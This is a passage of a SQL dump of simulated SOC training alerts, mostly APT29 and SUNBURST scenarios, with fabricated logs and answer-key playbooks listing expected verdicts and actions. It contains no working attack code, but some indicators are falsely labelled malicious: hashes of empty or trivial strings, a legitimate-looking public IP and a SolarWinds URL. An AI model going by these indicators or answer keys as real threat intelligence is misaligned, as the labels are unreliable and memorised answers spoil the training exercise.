'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with APT actors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account used to perform registry changes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (549, 'Anomalous Network Activity Detected', 'high', 'Network Traffic Analysis', 'Advanced lateral movement activity detected, involving Bluetooth sniffing to map and infiltrate additional devices within the local network. The malware is expanding its reach by targeting vulnerable hosts using identified Bluetooth connections.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"NT-4567\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.0.25\",\"external_attacker_ip\":\"203.0.113.45\",\"filename\":\"BlueSniff_v2.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"internal_user\",\"bluetooth_device\":\"00:1A:7D:DA:71:11\",\"event_type\":\"lateral_movement\",\"protocol\":\"Bluetooth\",\"description\":\"Detected suspicious Bluetooth activity attempting to discover and access local devices.\",\"action\":\"attempted lateral movement\"}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in lateral movement attacks\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"BlueSniff_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used for Bluetooth sniffing and lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (550, 'Sensitive Data Exfiltration in Progress', 'critical', 'Data Loss Prevention (DLP) Logs', 'The malware has initiated a covert data exfiltration process, leveraging screen capture and audio recording modules to gather intelligence. This activity was detected as sensitive files were being transmitted to an external command and control server.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-24T14:32:56Z\",\"event_id\":\"DLP-EXFIL-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.42\",\"file_name\":\"confidential_project.pptx\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"user\":\"jdoe\",\"process_name\":\"malware_exfil.exe\",\"process_hash\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"protocol\":\"HTTPS\",\"action\":\"File Transfer\",\"detection_method\":\"Screen Capture and Audio Recording Modules\"}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware executable.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_project.pptx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention\",\"verdict\":\"sensitive\",\"details\":\"File tagged as containing sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (551, 'Suspicious Initial Access Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting an engineer\'s workstation. The email contains a malicious attachment likely aimed at compromising the system.', 'Spear Phishing', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:23Z\",\"email_id\":\"12345abcde\",\"subject\":\"Project Timeline Update\",\"sender\":\"john.doe@trustedsource.com\",\"recipient\":\"engineer@targetcompany.com\",\"attachment_name\":\"Project_Timeline_Update.docx\",\"attachment_hash\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.15\",\"action\":\"Delivered\",\"malware_detected\":true,\"malware_name\":\"APT_Equation_Backdoor\"}', '2026-01-07 22:35:14', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the engineer\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the APT_Equation_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Project_Timeline_Update.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Attachment Analysis\",\"verdict\":\"malicious\",\"details\":\"Document contains macros that execute malicious code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (552, 'Malicious Code Execution Alert', 'high', 'Endpoint Detection and Response', 'A malicious payload was executed on a compromised system which installs a rootkit, preparing for the next phase of the attack.', 'Code Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"process_name\":\"cmd.exe\",\"process_command_line\":\"cmd.exe /c C:\\\\Windows\\\\System32\\\\malicious_payload.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_payload.exe\",\"action\":\"Executed\",\"severity\":\"high\",\"description\":\"Malicious payload executed on endpoint\"}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Malware file associated with known attack vectors\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash identified as malicious by multiple AV engines\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (553, 'Rootkit Establishes Persistence', 'high', 'System Registry and Scheduled Tasks', 'A rootkit has been detected establishing persistence on the compromised system. It has modified system registry keys and created scheduled tasks to ensure its presence even after system reboots. The rootkit utilizes known persistence techniques to maintain long-term access.', 'Persistence Mechanism', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"system\":{\"computer\":\"compromised-machine.local\",\"user\":\"j.doe\",\"ip_address\":\"10.0.2.15\"},\"registry_changes\":[{\"key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"maliciousStartup\",\"data\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\"}],\"scheduled_tasks\":[{\"task_name\":\"UpdateService\",\"action\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\",\"trigger\":\"Logon\"}],\"network\":{\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with prior attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with rootkit.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account on the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (554, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Using dumped credentials, the attacker moves laterally through the network, targeting systems connected to industrial control networks.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"SMB\",\"username\":\"admin_jdoe\",\"filename\":\"credentials.dmp\",\"hash\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"action\":\"Successful Login\",\"log_id\":\"123456789\"}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the target system within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid network administrator account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File associated with credential dumping activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (555, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention', 'A data exfiltration attempt was detected involving critical industrial control system information. The attacker utilized a known malware to transfer files to an external IP address.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:55:32Z\",\"event_id\":\"DLP-2023-1025-0001\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"filename\":\"ICS_critical_data.zip\",\"action\":\"block\",\"protocol\":\"HTTPS\",\"outcome\":\"success\",\"description\":\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\"}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with known exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ICS_critical_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of targeted ICS data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised to facilitate data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (556, 'Initial Access via Compromised SolarWinds Update', 'critical', 'Network Traffic Logs', 'APT29 gains initial access by compromising the SolarWinds Orion software update, distributing the SUNBURST backdoor to numerous high-profile targets. Anomalous network traffic detected from an internal server communicating with a known malicious external IP associated with the SUNBURST backdoor.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.100.87.55\",\"protocol\":\"HTTPS\",\"src_port\":443,\"dest_port\":443,\"http_request\":{\"url\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"method\":\"GET\"},\"file_hash\":\"b91ce2fa41029f6955bff20079468448\",\"user_agent\":\"SolarWindsOrion/2020.2.1\",\"internal_username\":\"admin\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server identified as part of the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with SUNBURST backdoor activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to SUNBURST.dll known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"URL distributing SUNBURST backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (557, 'SUNBURST Backdoor Activation', 'critical', 'Endpoint Detection Systems', 'Upon successful update, the SUNBURST backdoor is activated, allowing APT29 to remotely control the infected systems.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"4521\",\"source_ip\":\"185.243.115.84\",\"destination_ip\":\"10.0.0.15\",\"filename\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"hash\":\"b91ce2fa41029f6955bff20079468448\",\"user\":\"jdoe\",\"process\":\"orion.exe\",\"action\":\"execution\",\"details\":\"The SolarWinds.Orion.Core.BusinessLayer.dll file was executed, activating the SUNBURST backdoor.\",\"protocol\":\"TCP\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.243.115.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with SUNBURST malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File involved in SUNBURST backdoor activation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (558, 'Establishing Persistence with SUNBURST', 'high', 'System Registry Changes', 'APT29 is leveraging the SUNBURST backdoor to modify system registry settings, ensuring long-term access to the compromised networks.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"SunburstPersistence\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"hash\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Program Files\\\\SolarWinds\\\\Orion\\\\Sunburst.dll\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT29 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the SUNBURST backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Sunburst.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File associated with SUNBURST malware used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (559, 'C2 Communication via Domain Generation Algorithm', 'high', 'DNS Traffic Analysis', 'The DNS logs indicate that a compromised host is communicating with multiple dynamically generated domains. This activity is indicative of command and control operations using a domain generation algorithm (DGA) typically employed by advanced persistent threats such as APT29.', 'Command and Control', 'T1568.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-06T14:23:45Z\",\"source_ip\":\"10.0.1.15\",\"destination_domain\":\"hgytqwoein.com\",\"queried_domains\":[\"hgytqwoein.com\",\"sjdhgqjwev.com\",\"aslkdjqwope.com\"],\"resolver_ip\":\"8.8.8.8\",\"detected_algorithm\":\"DGA\",\"associated_hash\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"user\":\"jsmith\",\"process\":\"dns.exe\",\"internal_ip\":\"10.0.1.15\",\"external_ip\":\"198.51.100.14\",\"threat_actor\":\"APT29\",\"malware\":\"CustomDGA\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"hgytqwoein.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Domain generated by a known DGA pattern used by APT29.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29\'s DGA malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"External IP associated with suspected command and control server.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (560, 'Credential Harvesting for Lateral Movement', 'high', 'Authentication Logs', 'APT29 utilizes harvested credentials to move laterally within the network, accessing sensitive systems and data.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T12:45:32Z\",\"event_id\":\"4624\",\"computer_name\":\"server-01.internal.local\",\"logon_type\":\"3\",\"subject\":{\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"account_name\":\"admin_user\",\"account_domain\":\"INTERNAL\"},\"network_information\":{\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"10.0.0.15\"},\"additional_information\":{\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"transmitted_services\":\"-\",\"lm_package_name\":\"-\"},\"threat_actor_ip\":\"185.199.108.153\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"APT29_tool.exe\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 credential harvesting tool.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"APT29_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"suspicious\",\"details\":\"Executable detected during lateral movement activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Internal admin account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (561, 'Deployment of Second-Stage Payloads', 'high', 'Malware Analysis Reports', 'The attackers deployed second-stage payloads to enhance their intelligence-gathering capabilities and maintain control over compromised systems. This activity is associated with APT29, known for sophisticated supply chain attacks and spearphishing campaigns.', 'Execution', 'T1059', 1, 'new', NULL, 